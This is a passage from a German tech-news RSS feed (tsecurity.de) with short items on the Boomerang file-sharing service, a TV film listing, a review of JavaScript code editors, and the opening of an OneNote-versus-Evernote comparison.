<pubDate>Wed, 22 Jul 2026 09:06:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></content:encoded>
</item>
<item>
<title><![CDATA[So teilen Sie große Dateien kostenlos und ohne Anmeldung per Cloud]]></title>
<description><![CDATA[Das Teilen großer Dateien und Datenmengen gelingt sehr einfach über Transferdienste in der Cloud. Mit Boomerang gibt es nun ein neues Angebot, hinter dem Start-up steht einer der Gründer des populären Webservice „WeTransfer“. Boomerang lässt sich gratis nutzen, dazu ist nicht einmal eine Anmeldun...]]></description>
<link>https://tsecurity.de/de/3685377/windows-tipps/so-teilen-sie-grosse-dateien-kostenlos-und-ohne-anmeldung-per-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685377/windows-tipps/so-teilen-sie-grosse-dateien-kostenlos-und-ohne-anmeldung-per-cloud/</guid>
<pubDate>Wed, 22 Jul 2026 08:07:22 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das Teilen großer Dateien und Datenmengen gelingt sehr einfach über Transferdienste in der Cloud. Mit <a href="https://bmrng.me/" target="_blank" rel="noreferrer noopener">Boomerang</a> gibt es nun ein neues Angebot, hinter dem Start-up steht einer der Gründer des populären Webservice „WeTransfer“. Boomerang lässt sich gratis nutzen, dazu ist nicht einmal eine Anmeldung erforderlich. Ohne Konto steht über den Dienst bis zu einem Gigabyte Speicherplatz zum Verschicken und für sieben Tage zum Download zur Verfügung. </p>



<p><strong>So geht’s:</strong> Ziehen Sie bitte auf der Startseite eine oder mehrere Dateien in den Browser. Im folgenden Schritt können Sie über den „Add more“-Button weitere Daten zum Transfer hinzufügen. Mit „Upload Files“ starten Sie das Hochladen, anschließend sehen Sie alle wichtigen Informationen zum Teilen: Mit „Copy Link“ rechts oben kopieren Sie die Download-URL, die Sie dem Empfänger auf beliebigem Weg zuschicken. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a605e08ec0d0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Boomerang_RGBeci.jpg?quality=50&amp;strip=all&amp;w=932" alt="Boomerang " class="wp-image-3141149" width="932" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Boomerang erlaubt das einfache Teilen von großen Datenpaketen. Der Clouddienst funktioniert ganz ohne Anmeldung, mit Anmeldung ist die Nutzung bis 3 GB kostenlos.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Wenn Sie ein kostenloses Boomerang-Konto anlegen, können Sie „Spaces“ anlegen und maximal 3 GB große Dateien verschicken. In einem Space verwalten Sie Ihre Dateien, löschen Einträge oder fügen weitere Daten hinzu. Im Boomerang-Dashboard sehen und verwalten Sie die Spaces. </p>



<p>Oben benennen Sie sie um oder wählen zur Kennzeichnung ein Emoji. Option 3 ist das bezahlte Pro-Konto für knapp sieben Euro pro Monat: Es bietet zusätzliche Funktionen beim Datenschutz, 200 GB Speicherplatz, bis zu fünf GB große Dateien und die Bereitstellung der Download-Links bis zu 90 Tagen.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/1092915/vertrauliche-daten-sicher-von-pc-zu-pc-schicken.html" target="_blank" rel="noreferrer noopener">Vertrauliche Daten sicher von PC zu PC schicken</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[300-Millionen-Spektakel mit Dwayne Johnson: Dieser knallharte Action-Hit läuft heute (22.07.) kostenlos im TV]]></title>
<description><![CDATA[Dwayne "The Rock" Johnson klettert heute im TV auf den höchsten High-Tech-Tower der Welt, um seine Familie zu retten. Währenddessen steht alles unter Flammen!
																					Dieser Artikel wurde einsortiert unter 
																	ProSieben,																	TV-Show,																	TV-Serie...]]></description>
<link>https://tsecurity.de/de/3685305/it-nachrichten/300-millionen-spektakel-mit-dwayne-johnson-dieser-knallharte-action-hit-laeuft-heute-2207-kostenlos-im-tv/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685305/it-nachrichten/300-millionen-spektakel-mit-dwayne-johnson-dieser-knallharte-action-hit-laeuft-heute-2207-kostenlos-im-tv/</guid>
<pubDate>Wed, 22 Jul 2026 07:16:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dwayne "The Rock" Johnson klettert heute im TV auf den höchsten High-Tech-Tower der Welt, um seine Familie zu retten. Währenddessen steht alles unter Flammen!
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/prosieben.html">ProSieben</a>,																	<a href="https://www.netzwelt.de/tv-show/">TV-Show</a>,																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/tv-sender/">TV-Sender</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/joyn-index.html">Joyn</a>,																	<a href="https://www.netzwelt.de/joyn/index.html">Joyn</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/joyn-neue-filme-serien-starts-kosten-highlights-neuheiten.html">Neu bei Joyn: Diese Serien-, Show- und Filmhighlights starten im Juli und August 2026</a>,																	<a href="https://www.netzwelt.de/joyn/index.html">Joyn</a>,																	<a href="https://www.netzwelt.de/filme/">Filme</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten JavaScript-Editoren]]></title>
<description><![CDATA[width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px">Diese Texteditoren bringen JavaScript-Developer weiter.  R.Narong | shutterstock.com



JavaScript-Entwicklern stehen viele gute Tools zur Auswahl. Beinahe zu viele, um den Überblick zu behalten. In diesem Artikel stellen w...]]></description>
<link>https://tsecurity.de/de/3685190/it-security-nachrichten/die-besten-javascript-editoren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685190/it-security-nachrichten/die-besten-javascript-editoren/</guid>
<pubDate>Wed, 22 Jul 2026 05:40:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Diese Texteditoren bringen JavaScript-Developer weiter.  </figcaption></figure><p class="imageCredit">R.Narong | shutterstock.com</p></div>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2832952/was-ist-javascript.html" target="_blank">JavaScript</a>-Entwicklern stehen viele gute Tools <a href="https://www.computerwoche.de/article/2821289/7-javascript-projekte-die-sie-kennen-sollten.html" target="_blank">zur Auswahl</a>. Beinahe <a href="https://www.computerwoche.de/article/2833386/die-besten-javascript-frameworks-im-vergleich.html" target="_blank">zu viele</a>, um den Überblick zu behalten. In diesem Artikel stellen wir Ihnen die besten Texteditoren vor, um:</p>



<ul class="wp-block-list">
<li>mit JavaScript, HTML5 und CSS zu entwickeln, sowie</li>



<li>mit <a href="https://www.computerwoche.de/article/3995075/was-ist-markdown.html" target="_blank">Markdown</a> zu dokumentieren.</li>
</ul>



<h2 class="wp-block-heading"><a href="https://www.sublimetext.com/" target="_blank" rel="noreferrer noopener">Sublime Text</a></h2>



<p class="wp-block-paragraph">Bei Sublime Text sind Sie genau richtig, wenn:</p>



<ul class="wp-block-list">
<li>Sie einen flexiblen, leistungsstarken, erweiterbaren und ausgesprochen schnellen Code-Editor suchen.</li>



<li>es Ihnen nichts ausmacht, für Code Checking, Debugging und Deployment zu anderen Fenstern zu wechseln.  </li>
</ul>



<p class="wp-block-paragraph">Zu den vielen weiteren, bemerkenswerten Stärken von <a href="https://www.computerwoche.de/article/3607168/code-editor-vergleich-visual-studio-code-vs-sublime-text.html" target="_blank">Sublime Text</a> gehören neben seiner Geschwindigkeit und dem Support für mehr als 70 Datei-Typen (darunter JavaScript, HTML und CSS) auch noch:</p>



<ul class="wp-block-list">
<li>Instant-Navigation und Projekt-Switching,</li>



<li>die Option, eine Reihe von Änderungen per Mehrfachauswahl „auf einen Schlag“ auszuführen,</li>



<li>Support für mehrere Bildschirme und Split-Windows,</li>



<li>eine Plug-in-API auf Python-Basis, sowie</li>



<li>eine einheitliche, durchsuchbare Befehlspalette.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Sublime Text ist in vielerlei Hinsicht konfigurier- und anpassbar. </figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Für Programmierer, die von anderen Editoren kommen, hilfreich: Sublime Text unterstützt sowohl TextMate-Bundles (ohne Befehle) als auch die Vi/Vim-Emulation. Dabei lässt sich der Code-Editor in so gut wie jeder Hinsicht anpassen, egal, ob es um Farbschemata, Schriftarten, Tastenkombinationen, Snippets oder die Regeln für die Syntaxhervorhebung geht.</p>



<p class="wp-block-paragraph">Rund um Sublime Text existiert ebenfalls eine aktive Community, die Packages und Plug-ins erstellt und pflegt. Mit Hilfe des <a href="https://sublime.wbond.net/browse" target="_blank" rel="noreferrer noopener">Package Installers</a> sind diverse zusätzliche Funktionen verfügbar.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: unbegrenzte kostenlose Testversion; 65 Dollar pro Jahr und Seat für die Business-Version; 99 Dollar für eine Privatlizenz (Support für drei Jahre);</li>



<li><strong>Plattformen</strong>: Windows, macOS und Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://code.visualstudio.com/" target="_blank" rel="noreferrer noopener">Visual Studio Code</a></h2>



<p class="wp-block-paragraph">Visual Studio Code ist ein quelloffener, kostenloser Editor von Microsoft. Er enthält einen Mix aus Komponenten von Visual Studio und der Open-Source-Shell Atom Electron und bietet umfassenden Support für:</p>



<ul class="wp-block-list">
<li>ASP.Net Core Development mit C# und</li>



<li>Node.js Development mit TypeScript und JavaScript.</li>
</ul>



<p class="wp-block-paragraph">Dank des TypeScript-Compilers und der Salsa-Engine bietet <a href="https://www.computerwoche.de/article/2833165/10-tricks-fuer-visual-studio-code.html" target="_blank">Visual Studio Code</a> eine erstaunlich gute JavaScript-Codevervollständigung. Dazu sendet VS Code Ihren JavaScript-Code im Hintergrund an den TypeScript-Compiler, um Typen abzuleiten und eine Symboltabelle zu erstellen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Visual Studio Code darf in einer Auflistung der besten JavaScript-Editoren nicht fehlen.</figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Während Sie eine Expression eingeben, ermöglicht dieselbe Symboltabelle es IntelliSense, diverse nützliche Pop-up-Optionen zur Codevervollständigung zur Verfügung zu stellen.</p>



<p class="wp-block-paragraph">Der Support für <a href="https://www.computerwoche.de/article/2812266/was-ist-git.html" target="_blank">Git</a> ist umfangreich und simpel zu nutzen, der VS-Code-Debugger bietet eine hervorragende Erfahrung für Node.js und ASP.Net-Projekte. Visual Studio Code kann darüber hinaus auch mit externen Task-Runnern wie gulp und jake integriert werden und kann mit einem umfangreichen Ökosystem für Extensions aufwarten.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattformen</strong>: Windows, macOS, Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://brackets.io/?lang=de" target="_blank" rel="noreferrer noopener">Brackets</a></h2>



<p class="wp-block-paragraph">Brackets ist ein kostenloser Open-Source-Editor, der ursprünglich von Adobe stammt. Das Ziel der Entwickler: Bessere Tools für JavaScript, HTML, CSS und verwandte, offene Webtechnologien bereitzustellen. Auch Brackets selbst ist in JavaScript, HTML und CSS geschrieben.</p>



<p class="wp-block-paragraph">Zusätzlich zu den integrierten Funktionen verfügt Brackets über einen Extension Manager. Der ist auch nötig, denn die sind für diverse Programmiersprachen und Tools aus der Welt der <a href="https://www.computerwoche.de/article/2824968/3-wege-zum-vorzeige-frontend.html" target="_blank">Frontend-Entwickler</a> verfügbar. In der Praxis ist Brackets zwar nicht so schnell wie Sublime Text (siehe weiter oben) oder TextMate (siehe weiter unten). Aber der Editor ist immer noch schnell genug. Brackets bietet umfassenden Support für:</p>



<ul class="wp-block-list">
<li>JavaScript,</li>



<li>CSS,</li>



<li>HTML und</li>



<li>Node.js.</li>
</ul>



<p class="wp-block-paragraph">Darüber hinaus bietet Brackets weitere nützliche Funktionen wie beispielsweise:</p>



<ul class="wp-block-list">
<li>CSS inline in Verbindung mit einer HTML-ID bearbeiten,</li>



<li>eine übersichtliche Benutzeroberfläche und</li>



<li>eine Live-Vorschau für Webseiten in Bearbeitung.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Brackets ist in erster Linie für die Webentwicklung konzipiert.</figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Auch beim Blick auf die automatische Vervollständigung von JavaScript-Code kann Brackets in der Praxis überzeugen: Es schließt automatisch sämtliche Klammern und stellt Dropdown-Menüs für Keywords, Variablen und Methoden zur Verfügung. Der JavaScript-Editor ist auch in der Lage, den Node.js-Debugger zu steuern und Node über ein Menüelement neu zu starten. Erweiterungen für zusätzliche Funktionen wie <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" target="_blank">TypeScript</a>– und <a href="https://www.computerwoche.de/article/2831038/html-das-javascript-kann.html" target="_blank">JSX</a>-Support, Bower- und Git-Integration lassen sich schnell und einfach hinzufügen.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattformen</strong>: Windows, macOS, Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://github.com/atom" target="_blank" rel="noreferrer noopener">Atom</a></h2>



<p class="wp-block-paragraph">Dieser kostenlose, quelloffene und “hack”-bare Programmier-Editor stammt aus dem Hause GitHub und lässt sich in die entsprechende Anwendung integrieren. Tausende von Packages und Themes stehen zur Verfügung, um Atom anzupassen. Der Quellcode von Atom wird selbstverständlich auch auf GitHub gehostet, ist in CoffeeScript geschrieben und in Node.js integriert.</p>



<p class="wp-block-paragraph">Bei Atom handelt es sich um eine spezialisierte Variante von Chromium, die eher als Texteditor denn als Webbrowser konzipiert ist. Jedes Atom-Fenster ist im Wesentlichen eine lokal gerenderte Webseite.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">Der Open-Source-Editor von GitHub kann in der Praxis überzeugen.</figcaption></figure><p class="imageCredit">IDG</p></div>



<p class="wp-block-paragraph">In der Praxis zeigt sich Atom performant. Der Editor ist sofort einsatzbereit und überzeugt unter anderem mit:</p>



<ul class="wp-block-list">
<li>einem “Fuzzy-Finder”,</li>



<li>der Möglichkeit, schnell und projektübergreifend zu suchen,</li>



<li>Multi-Cursor- und Windows-Optionen,</li>



<li>Snippets und Code-Folding sowie</li>



<li>der Möglichkeit, TextMate-Grammatiken und -Themen zu importieren.</li>
</ul>



<p class="wp-block-paragraph">Atom ist insbesondere praktisch, um Repositories zu durchsuchen, die von GitHub geklont wurden, weil die GitHub-Applikation zu diesem Zweck ein Kontextmenüelement enthält.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattformen</strong>: Windows, macOS, Linux;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://notepad-plus-plus.org/" target="_blank" rel="noreferrer noopener">Notepad++</a></h2>



<p class="wp-block-paragraph">Ein weiterer kostenloser Open-Source-Editor, der gut für JavaScript geeignet ist – allerdings nur auf Windows läuft. Notepad++ unterstützt außerdem etwa 50 weitere Programmier- und Markup-Sprachen. Neben seinem Multi-Document-Editing-Fenster bietet dieser Editor auch eine “Workspace Tree View”, sowie Registerkarten mit Funktionslisten und Dokumentenübersicht. In der Praxis bekommt man dabei nie das Gefühl, ausgebremst zu werden.</p>



<p class="wp-block-paragraph">Mit Syntax-Farb- und -Folding-Optionen, leistungsstarken Editing-Funktionen sowie Paramter-Hints hat Notepad++ das Zeug zum primären JavaScript-Texteditor. Allerdings ist es bei weitem nicht der umfassendste JavaScript-Editor, wenn es darum geht:</p>



<ul class="wp-block-list">
<li>Code zu generieren,</li>



<li>Refactoring anzustoßen oder</li>



<li>schnell durch große Projekte zu navigieren.</li>
</ul>



<p class="wp-block-paragraph">Nichtsdestotrotz ist Notepad++ ist auch heute noch nützlich – vor allem, wenn es schnell und kostenlos gehen muss.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattform</strong>: Windows;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://www.barebones.com/products/bbedit/" target="_blank" rel="noreferrer noopener">BBEdit</a></h2>



<p class="wp-block-paragraph">Mit BBEdit steht auch für macOS-Benutzer ein proprietärer JavaScript-Editor bereit. Er unterstützt etwa 35 Programmier- und Markup-Sprachen. Für viele weitere Sprachen ist Community-Support (von unterschiedlicher Qualität) über die BBEdit-Website verfügbar. Sowohl die kostenlose als auch die lizenzierte Version bieten Syntaxhervorhebung. Code-Vervollständigung für Funktions- und Variablennamen, einige Keywords und ctags bleiben den Nutzern der kostenpflichtigen Version vorbehalten. Diese lässt sich auch in die <a href="https://www.computerwoche.de/article/2833711/version-control-systems-ein-ratgeber.html" target="_blank">Versionskontrollsysteme</a> Git, Perforce und Subversion integrieren.</p>



<p class="wp-block-paragraph">BBEdit wurde bereits vor einiger Zeit grundlegend überarbeitet und überzeugt in der Praxis nun auch, wenn es größere Dateien verarbeiten muss. Auch was HTML und Markdown angeht, gibt es nichts zu beanstanden – das funktioniert sogar besser als JavaScript.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlose aber eingeschränkte Version; 59,99 Dollar pro Benutzer für die Vollversion;</li>



<li><strong>Plattform</strong>: macOS;</li>
</ul>



<h2 class="wp-block-heading"><a href="https://macromates.com/" target="_blank" rel="noreferrer noopener">TextMate</a></h2>



<p class="wp-block-paragraph">Dieser (ebenfalls macOS-exklusive) Code-Editor war einmal der letzte Schrei, verlor dann stark an Bedeutung und wird inzwischen wieder aktiv weiterentwickelt. TextMate ist zwar keine IDE, lässt sich aber über Bundles, Snippets, Makros und sein Scoping-System mit Funktionen ausstatten, die selbst sprachspezifische Entwicklungsumgebungen vermissen lassen. Was die Geschwindigkeit angeht, ist TextMate fast so schnell wie Sublime Text.</p>



<p class="wp-block-paragraph">Für eine IDE-ähnliche Funktionalität können Sie die Shell-Integration von TextMate verwenden, erwarten Sie aber kein Code Refactoring oder automatische Unit- und Regressionstests. Wenn Sie Grunt richtig einrichten, können Sie Ihre JavaScript-Tests auf dieser Ebene natürlich trotzdem automatisieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full is-resized">&gt;<figcaption class="wp-element-caption">TextMate bietet diverse Bundles.</figcaption></figure><p class="imageCredit">IDG</p></div>




<p class="wp-block-paragraph">Auch Support für Markdown wird über ein integriertes Bundle bereitgestellt. Dieses enthält:</p>



<ul class="wp-block-list">
<li>eine Preview-Funktion für Dokumente,</li>



<li>ein Markdown-„Cheatsheet“ sowie</li>



<li>diverse Tastenkombinationen, um Markup zu generieren.</li>
</ul>



<p class="wp-block-paragraph">Um TextMate mit Git und GitHub zu integrieren, eignet sich hingegen das Git-Bundle gut. In der Praxis erkennt TextMate vorhandene Git-Repositories und kann diese per Pull-Befehl aus dem Bundle von GitHub aktualisieren. Mit dem SQL-Bundle können Sie mit MySQL- und PostgreSQL-Datenbanken arbeiten.</p>



<ul class="wp-block-list">
<li><strong>Preis</strong>: kostenlos;</li>



<li><strong>Plattform</strong>: macOS;</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Beitrag ist <a href="https://www.infoworld.com/article/2252269/review-the-10-best-javascript-editors.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OneNote vs. Evernote: Notiz-Apps im Vergleich]]></title>
<description><![CDATA[Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. 
					Foto: Bonya_06_Inna_Kharlamova_Makini_Caravello – shutterstock.com




Geht es um die richtige Notiz-App, fällt die Entscheidung im Regelfall zwischen OneNote von Microsoft und Evernote, das inzwischen dem italieni...]]></description>
<link>https://tsecurity.de/de/3685167/it-security-nachrichten/onenote-vs-evernote-notiz-apps-im-vergleich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685167/it-security-nachrichten/onenote-vs-evernote-notiz-apps-im-vergleich/</guid>
<pubDate>Wed, 22 Jul 2026 05:06:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. " title="Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. " src="https://images.computerwoche.de/bdb/3380610/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Evernote und OneNote tragen den Kampf um die Notiz-App-Krone unter sich aus. </p></figcaption></figure><p class="imageCredit">
					Foto: Bonya_06_Inna_Kharlamova_Makini_Caravello – shutterstock.com</p></div>




<p class="wp-block-paragraph">Geht es um die richtige Notiz-App, fällt die Entscheidung im Regelfall zwischen OneNote von Microsoft und Evernote, das inzwischen dem italienischen Softwareunternehmen <a href="https://www.computerwoche.de/article/2818214/zweiter-fruehling-fuer-die-notizen-app.html" title="Bending Spoons gehört" target="_blank">Bending Spoons gehört</a>. </p>



<ul class="wp-block-list">
<li><p><strong>OneNote</strong> ist seit dem Jahr 2003 auf dem Markt und wurde 2007 in Microsofts Office-Suite aufgenommen (die meisten Versionen laufen inzwischen unter dem Namen Microsoft 365). Zudem wird OneNote auch mit Windows 10 und 11 gebündelt und als eigenständiges Produkt kostenlos angeboten. Das eröffnet eine potenzielle Nutzerbasis von rund einer Milliarde Systemen.</p></li>



<li><p><strong>Evernote</strong> feierte im Jahr 2008 sein Marktdebüt und erfreut sich seither stetig wachsender Nutzerzahlen. Unternehmensangaben zufolge sind es inzwischen weltweit rund 225 Millionen User.</p></li>
</ul>



<p class="wp-block-paragraph">Sowohl OneNote als auch Evernote sind für alle wichtigen Desktop- und Mobile-Betriebssysteme verfügbar. Beide sind in der Lage, Notizen mit allen Geräten und dem Internet zu synchronisieren und beide versprechen, die einzige notwendige App für Notizen zu sein. Stellt sich die Frage: Was ist die bessere Wahl für <a href="https://www.computerwoche.de/article/2795948/die-besten-productivity-apps.html" title="Business-Nutzer" target="_blank">Business-Nutzer</a>?</p>



<p class="wp-block-paragraph">Wir haben uns die jeweils aktuellen Versionen beider Notiz-Apps für <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>, macOS, iPadOS, iOS und <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> angesehen und sagen Ihnen, worin sich OneNote und Evernote im Wesentlichen unterscheiden. </p>



<h2 class="wp-block-heading">One Note: Organisationskrösus</h2>



<p class="wp-block-paragraph"><a href="https://www.microsoft.com/de-de/microsoft-365/onenote/digital-note-taking-app" title="OneNote" target="_blank" rel="noopener">OneNote</a> ist eine vollwertige Anwendung. Mit ihr können Sie einfache oder komplexe Notizen von Grund auf neu erstellen, sie in durchsuchbaren Notizbüchern organisieren und mit einer Vielzahl von Plattformen synchronisieren – zum Beispiel <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-PCs, Macs, iPads und iPhones sowie <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Geräten.</p>



<p class="wp-block-paragraph">Außerdem strotzt Microsofts Notiz-App nur so vor Werkzeugen – beispielsweise um:</p>



<ul class="wp-block-list">
<li><p>Notizen zu erstellen und zu bearbeiten,</p></li>



<li><p>zu zeichnen,</p></li>



<li><p>Audio- und Videoaufnahmen zu erstellen,</p></li>



<li><p>Bilder zu scannen oder</p></li>



<li><p>Tabellenkalkulationen einzubetten,</p></li>
</ul>



<p class="wp-block-paragraph">OneNote wird allmählich immer stärker in die <a href="https://www.computerwoche.de/article/3523691/microsoft-365-erklart.html" target="_blank">Microsoft-365-Suite</a> integriert. Für Unternehmen ist die Live-Zusammenarbeit besonders wichtig und sie funktioniert hier ebenso so wie in anderen Microsoft-365-Anwendungen. Besonders gut lässt sich OneNote dabei in <a title="Microsoft Teams" href="https://www.computerwoche.de/article/2795511/microsoft-teams-optimal-nutzen.html" target="_blank">Microsoft Teams</a> integrieren: Notizbücher lassen sich Teams hinzufügen – jeder innerhalb des Kanals kann diese anschließend anzeigen und bearbeiten (entsprechende Zugriffsrechte vorausgesetzt).</p>



<p class="wp-block-paragraph"><strong>Web-Clipping</strong></p>



<p class="wp-block-paragraph">So gut OneNote auch sein mag, wenn es darum geht Notizen zu erstellen: Es bleibt hinter den beträchtlichen Möglichkeiten von Evernote zurück, wenn es um das Clipping von Webinhalten geht. Dazu bietet OneNote ein Browser-Addon (Microsoft Edge, <a href="https://www.computerwoche.de/article/2805495/so-arbeiten-sie-besser-mit-google-chrome.html" title="Google Chrome" target="_blank">Google Chrome</a> und Mozilla Firefox) namens OneNote Web Clipper. Mit diesem Tool können Sie Screenshots in OneNote speichern – wenn es denn so funktioniert wie es soll.</p>



<p class="wp-block-paragraph"><strong>Versionsunterschiede</strong></p>



<p class="wp-block-paragraph">Die <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-Version von OneNote kann mit der vollen Bandbreite an Tools glänzen. Im Vergleich bietet Evernote nicht annähernd so viele ausgefeilte Tools. Die Versionen für Web, <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>, iPadOS und macOS fallen hingegen ab. Sie sehen zwar ähnlich aus wie die <a href="https://www.computerwoche.de/operating-systems/" target="_blank" class="idgGlossaryLink">Windows</a>-App, bieten im Vergleich aber weniger und teilweise eingeschränkte Funktionen. So können Sie hier etwa keine Tabellenkalkulationen integrieren oder Videoinhalte aufzeichnen. Die <a href="https://apps.apple.com/de/app/microsoft-onenote/id410395246" title="iOS-Version" target="_blank" rel="noopener">iOS-Version</a> hebt sich hingegen mit einer schlanken Benutzeroberfläche ab, die darauf optimiert ist, schnell Notizen zu erstellen oder zu bearbeiten. </p>



<p class="wp-block-paragraph"><strong>KI-Funktionen</strong></p>



<p class="wp-block-paragraph">Seit Mitte Januar 2024 bietet Microsoft mit <a title="Copilot Pro" href="https://www.computerwoche.de/article/2831382/microsoft-oeffnet-copilot-fuer-alle-office-nutzer.html" target="_blank">Copilot Pro</a> KI-Integration im Abomodell an – auch für OneNote.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">🧠 Work smarter with Copilot Notebooks in OneNote — your new AI-powered space to think, organize, and create. Bring all your content together and let Copilot help you get to insights, faster. <br><br>Learn more: <a href="https://t.co/c63JbghHcH">https://t.co/c63JbghHcH</a></p>— Microsoft OneNote (@msonenote) <a href="https://x.com/msonenote/status/1940802718257357260?ref_src=twsrc%5Etfw">July 3, 2025</a></blockquote>
</div></figure>



<p class="wp-block-paragraph"><strong>Storage und Preise</strong></p>



